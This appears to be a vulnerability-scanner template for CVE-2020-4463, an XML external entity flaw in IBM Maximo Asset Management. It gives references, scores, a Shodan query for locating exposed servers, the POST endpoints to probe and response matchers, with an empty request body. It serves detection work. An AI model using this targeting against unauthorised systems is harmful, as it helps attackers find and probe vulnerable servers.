id: CVE-2020-4463 info: name: IBM Maximo Asset Management Information Disclosure - XML External Entity Injection author: dwisiswant0 severity: high description: | IBM Maximo Asset Management is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. impact: | The vulnerability can lead to unauthorized access to sensitive information or a denial of service. remediation: | Apply the latest security patches or updates provided by IBM to mitigate the vulnerability. reference: - https://www.ibm.com/support/pages/security-bulletin-ibm-maximo-asset-management-vulnerable-information-disclosure-cve-2020-4463 - https://github.com/Ibonok/CVE-2020-4463 - https://exchange.xforce.ibmcloud.com/vulnerabilities/181484 - https://www.ibm.com/support/pages/node/6253953 - https://nvd.nist.gov/vuln/detail/CVE-2020-4463 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:L cvss-score: 8.2 cve-id: CVE-2020-4463 cwe-id: CWE-611 epss-score: 0.71269 epss-percentile: 0.97741 cpe: cpe:2.3:a:ibm:maximo_asset_management:7.6.0.1:*:*:*:*:*:*:* metadata: max-request: 2 vendor: ibm product: maximo_asset_management shodan-query: http.favicon.hash:-399298961 tags: cve,cve2020,ibm,xxe,disclosure http: - method: POST path: - "{{BaseURL}}/os/mxperson" - "{{BaseURL}}/meaweb/os/mxperson" body: | headers: Content-Type: "application/xml" matchers-condition: and matchers: - type: word part: body words: - "QueryMXPERSONResponse" - "MXPERSONSet" - type: word part: header words: - "application/xml" # digest: 4a0a00473045022024a6fa769124fc65ecdee3026e1373ea3cd5a5392a7865a68d06e745b4bbf3ef022100e32e12f6cf95a0626e93efad2d08b0ae6dee27090521033269a499f2f42723fe:922c64590222798bb761d5b6d8e72950